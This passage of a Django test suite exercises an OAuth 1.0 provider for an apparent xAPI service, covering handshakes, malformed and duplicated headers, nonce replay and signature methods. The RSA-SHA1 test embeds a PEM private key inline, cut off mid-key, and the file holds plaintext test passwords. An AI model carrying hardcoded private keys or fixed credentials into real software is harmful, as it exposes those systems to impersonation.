settings.OAUTH_ENABLED = False # Delete everything Token.objects.all().delete() Consumer.objects.all().delete() Nonce.objects.all().delete() User.objects.all().delete() attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state") for the_file in os.listdir(attach_folder_path): file_path = os.path.join(attach_folder_path, the_file) try: os.unlink(file_path) except Exception, e: raise e def oauth_handshake(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[], request_nonce='', access_nonce='', resource_nonce='', consumer=None): # ============= INITIATE ============= if not request_nonce: request_nonce = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6)) if not consumer: consumer = self.consumer oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (consumer.key,str(int(time.time())), request_nonce) # Add non oauth parameters appropriately request_token_params = {} if parameters: request_token_params = parameters # Set scope if scope: if scope_type: request_token_params['scope'] = scope_type else: request_token_params['scope'] = "all" # Add non oauth params in query string or form if param_type == 'qs': request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params)) else: request_token_path = INITIATE_ENDPOINT # Make the params into a dict to pass into from_consumer_and_token oauth_header_request_token_params_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in oauth_header_request_token_params_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # Make oauth request depending on where the parameters are if param_type == 'qs': oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) else: oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='POST', http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items())) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature # Send request depending on the parameters if param_type == 'qs': request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) else: request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params, content_type="application/x-www-form-urlencoded") # Get request token (will be only token for that user) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) token_secret = request_resp.content.split('&')[0].split('=')[1] request_token = Token.objects.get(secret=token_secret) # ============= END INITIATE ============= # ============= AUTHORIZE ============= # Create authorize path, must have oauth_token param authorize_param = {'oauth_token': request_token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param)) # Try to hit auth path, made to login auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(request_token.key, auth_resp['Location']) self.client.login(username='jane', password='toto') self.assertEqual(request_token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view # Get the form, set required fields auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = request_token.key # Change scope if wanted if change_scope: data['scope'] = change_scope # Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) # Get token again just to make sure token_key = auth_post['Location'].split('?')[1].split('&')[1].split('=')[1] request_token_after_auth = Token.objects.get(key=token_key) self.assertIn(request_token_after_auth.key, auth_post['Location']) self.assertEqual(request_token_after_auth.is_approved, True) # ============= END AUTHORIZE ============= # ============= ACCESS TOKEN ============= if not access_nonce: access_nonce = "access_nonce" # Set verifier in access_token params and create new oauth request oauth_header_access_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier) # from_token_and_callback takes a dictionary param_list = oauth_header_access_token_params.split(",") oauth_header_access_params_dict = {} for p in param_list: item = p.split("=") oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_access_params_dict['OAuth realm'] oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET', http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict) # Create signature and add it to the headers signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, consumer, request_token_after_auth) oauth_header_access_token_params += ',oauth_signature="%s"' % signature # Get access token access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params) self.assertEqual(access_resp.status_code, 200) content = access_resp.content.split('&') access_token_secret = content[0].split('=')[1] access_token_key = content[1].split('=')[1] access_token = Token.objects.get(secret=access_token_secret, key=access_token_key) # ============= END ACCESS TOKEN ============= if not resource_nonce: resource_nonce = "resource_nonce" # Set oauth headers user will use when hitting xapi endpoing and access token oauth_header_resource_params = "OAuth realm=\"test\", "\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), resource_nonce) self.client.logout() return oauth_header_resource_params, access_token def oauth_handshake2(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[], request_nonce='', access_nonce='', resource_nonce=''): # ============= INITIATE ============= if not request_nonce: request_nonce = "request_nonce2" oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer2.key,str(int(time.time())), request_nonce) # Add non oauth parameters appropriately request_token_params = {} if parameters: request_token_params = parameters if scope: if scope_type: request_token_params['scope'] = scope_type else: request_token_params['scope'] = "all" if param_type == 'qs': request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params)) else: request_token_path = INITIATE_ENDPOINT # Make the params into a dict to pass into from_consumer_and_token oauth_header_request_token_params_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in oauth_header_request_token_params_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] if param_type == 'qs': oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) else: oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='POST', http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items())) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer2, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature if param_type == 'qs': request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) else: request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params, content_type="application/x-www-form-urlencoded") self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) request_token = Token.objects.get(consumer=self.consumer2) # ============= END INITIATE ============= # ============= AUTHORIZE ============= authorize_param = {'oauth_token': request_token.key} authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param)) auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 302) self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location']) self.assertIn(request_token.key, auth_resp['Location']) self.client.login(username='dick', password='lassie') self.assertEqual(request_token.is_approved, False) # After being redirected to login and logging in again, try get again auth_resp = self.client.get(authorize_path) self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view auth_form = auth_resp.context['form'] data = auth_form.initial data['authorize_access'] = 1 data['oauth_token'] = request_token.key # Change scope if wanted if change_scope: data['scope'] = change_scope auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data) self.assertEqual(auth_post.status_code, 302) # Check if oauth_verifier and oauth_token are returned self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location']) self.assertIn('oauth_token=', auth_post['Location']) request_token_after_auth = Token.objects.get(consumer=self.consumer2) self.assertIn(request_token_after_auth.key, auth_post['Location']) self.assertEqual(request_token_after_auth.is_approved, True) # ============= END AUTHORIZE ============= # ============= ACCESS TOKEN ============= if not access_nonce: access_nonce = "access_nonce2" oauth_header_access_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\","\ "oauth_verifier=\"%s\"" % (self.consumer2.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier) # from_token_and_callback takes a dictionary param_list = oauth_header_access_token_params.split(",") oauth_header_access_params_dict = {} for p in param_list: item = p.split("=") oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # from_request ignores realm, must remove so not input to from_token_and_callback del oauth_header_access_params_dict['OAuth realm'] oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET', http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict) # Create signature and add it to the headers signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer2, request_token_after_auth) oauth_header_access_token_params += ',oauth_signature="%s"' % signature access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params) self.assertEqual(access_resp.status_code, 200) content = access_resp.content.split('&') access_token_secret = content[0].split('=')[1] access_token_key = content[1].split('=')[1] access_token = Token.objects.get(secret=access_token_secret, key=access_token_key) # ============= END ACCESS TOKEN ============= if not resource_nonce: resource_nonce = "resource_nonce2" oauth_header_resource_params = "OAuth realm=\"test\", "\ "oauth_consumer_key=\"%s\","\ "oauth_token=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"%s\","\ "oauth_version=\"1.0\"" % (self.consumer2.key, access_token.key, str(int(time.time())), resource_nonce) self.client.logout() return oauth_header_resource_params, access_token def test_request_token_missing_headers(self): # Missing signature method oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # Create OAuth request and signature oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Append signature to string headers oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature resp = self.client.get(INITIATE_ENDPOINT) self.assertEqual(resp.status_code, 400) self.assertEqual(resp.content, 'Invalid request parameters.') def test_request_token_unsupported_headers(self): # Rogue oauth param added oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "this_is_not_good=\"blah\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # Create oauth request and signature oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Append signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature resp = self.client.get(INITIATE_ENDPOINT) self.assertEqual(resp.status_code, 400) self.assertEqual(resp.content, 'Invalid request parameters.') def test_request_token_duplicated_headers(self): # Duplicate signature_method oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Append signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature resp = self.client.get(INITIATE_ENDPOINT) self.assertEqual(resp.status_code, 400) self.assertEqual(resp.content, 'Invalid request parameters.') def test_request_token_unsupported_signature_method(self): # Add unsupported signature method oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"unsupported\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Append signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature resp = self.client.get(INITIATE_ENDPOINT) self.assertEqual(resp.status_code, 400) self.assertEqual(resp.content, 'Invalid request parameters.') def test_request_token_invalid_consumer_credentials(self): # Non existent consumer key oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"unsupported\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % ("aaaaaaaaaaaaaa",str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Append signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params) self.assertEqual(resp.status_code, 401) self.assertEqual(resp.content, 'Invalid consumer.') def test_request_token_unknown_scope(self): # passing scope as form param instead of in query string in this instance - scope DNE form_data = { 'scope':'DNE', } oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items())) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Add signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data, content_type="x-www-form-urlencoded") self.assertEqual(request_resp.status_code, 400) self.assertEqual(request_resp.content, 'Could not verify OAuth request.') def test_request_token_wrong_scope(self): # passing scope as form param instead of in query string in this instance form_data = { 'scope':'all', } oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items())) signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) # Add signature oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature #Change form scope from what oauth_request was made with form_data['scope'] = 'profile' request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data, content_type="x-www-form-urlencoded") self.assertEqual(request_resp.status_code, 400) self.assertEqual(request_resp.content, 'Could not verify OAuth request.') def test_request_token_same_nonce_and_time(self): # Nonce/timestamp/token combo should always be unique # Header params we're passing in now_time = str(int(time.time())) oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time) # Make string params into dictionary for from_consumer_and_token function request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) # ======================================== # Try to create another request token with the same nonce # Header params we're passing in oauth_header_request_token_params2 = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time) # Make string params into dictionary for from_consumer_and_token function request_token_param_list2 = oauth_header_request_token_params2.split(",") oauth_header_request_token_params_dict2 = {} for p in request_token_param_list2: item = p.split("=") oauth_header_request_token_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict2['OAuth realm'] # add scope to the existing params oauth_request2 = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict2) # create signature and add it to the header params signature_method2 = oauth.SignatureMethod_HMAC_SHA1() signature2 = signature_method2.sign(oauth_request2, self.consumer, None) oauth_header_request_token_params2 = oauth_header_request_token_params2 + ",oauth_signature=%s" % signature2 request_resp2 = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params2) self.assertEqual(request_resp2.status_code, 400) def test_request_token_no_scope(self): # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature # Should still give request_token even w/o scope sent request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) def test_request_token_scope_in_form(self): # passing scope as form param instead of in query string in this instance form_data = { 'scope':'all', 'consumer_name':'new_client' } # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='POST', http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items())) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature # By default django's test client POSTs as multipart. We want form request_resp = self.client.post(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data, content_type="application/x-www-form-urlencoded") self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) def test_request_token_scope_in_qs(self): # Set scope and consumer_name in param param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"HMAC-SHA1\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_HMAC_SHA1() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) def test_request_token_plaintext(self): param = { 'scope':'all', 'consumer_name':'new_client' } request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param)) # Header params we're passing in oauth_header_request_token_params = "OAuth realm=\"test\","\ "oauth_consumer_key=\"%s\","\ "oauth_signature_method=\"PLAINTEXT\","\ "oauth_timestamp=\"%s\","\ "oauth_nonce=\"requestnonce\","\ "oauth_version=\"1.0\","\ "oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time()))) # Make the params into a dict to pass into from_consumer_and_token request_token_param_list = oauth_header_request_token_params.split(",") oauth_header_request_token_params_dict = {} for p in request_token_param_list: item = p.split("=") oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"') # get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback del oauth_header_request_token_params_dict['OAuth realm'] # add scope to the existing params oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET', http_url=request_token_path, parameters=oauth_header_request_token_params_dict) # create signature and add it to the header params signature_method = oauth.SignatureMethod_PLAINTEXT() signature = signature_method.sign(oauth_request, self.consumer, None) oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params) self.assertEqual(request_resp.status_code, 200) self.assertIn('oauth_token_secret', request_resp.content) self.assertIn('oauth_token', request_resp.content) self.assertIn('oauth_callback_confirmed', request_resp.content) def test_request_token_rsa_sha1(self): rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY----- MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d 7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+ 